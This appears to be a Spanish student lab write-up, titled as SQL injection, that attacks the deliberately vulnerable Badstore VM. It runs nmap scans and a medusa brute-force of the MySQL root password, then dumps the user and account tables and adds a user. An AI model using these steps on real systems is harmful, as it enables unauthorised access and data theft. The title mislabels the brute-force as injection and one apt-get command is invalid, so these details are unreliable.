Delfina Soledad Rojas Losada

*Inyección de código SQL

*Inyección de código SQL

*La inyección de SQL es una técnica de inyección de código que explota una vulnerabilidad de seguridad dentro de la capa de base de datos de una aplicación. Esta vulnerabilidad puede encontrarse cuando la entrada del usuario se filtra de forma incorrecta debido a caracteres de escape embebidos en sentencias SQL.

*Desarrollo del ataque Inyección

SQL 

*Se inician las maquinas virtuales (Kali Linux y Badstore) y se consulta la ip de la maquina vulnerable.

*Instalación e incializacion de

Nmap

*Instalar nmap: sudo apt-get install nmap

*En nuestro caso estamos utilizando kali Linux, entonces nmap ya viene instalado por defecto, únicamente se restaura con el comando

*sudo apt-get restart nmap

*se inicia el escaneo a la maquina vulnerable, en este caso badstore: nmap 192.168.1.14

*Se inicia escaneo intensivo

* nmap –T4 -A –v 192.168.1.14

*Version de Mysql: 1.7. estándar

*Version de apache: HTTPD 1.3.28

Se procede al ataque

*Con el comando: medusa -h 192.168.1.14 -u root -P ./tools/diccionarios/phpbb.txt -e ns -M mysql

*Conexión a la base de datos

*badstore: badstoredb: mysql –u root –h 192.168.1.14

*Mostrar base de datos existentes

*Show databases;

*Visualización de tablas existentes

*Show tables;

*Visualizar la información de las tablas encontradas

*Select* from userdb;

*select* from orderdb;

*select* from itembd;

*select* from acctbd;

*Nuevo usuario

*Las contraseñas están encriptadas, no podemos acceder a la información, por ello se crea un nuevo usuario.

*Consulta de nuevo usuario.

*Select* from userdb;

*Referencias

*PORTAL HACKER:

* http://www.portalhacker.net/b37/propuesta-atacar-badstore-entre-todos-documentarlo/127736/

*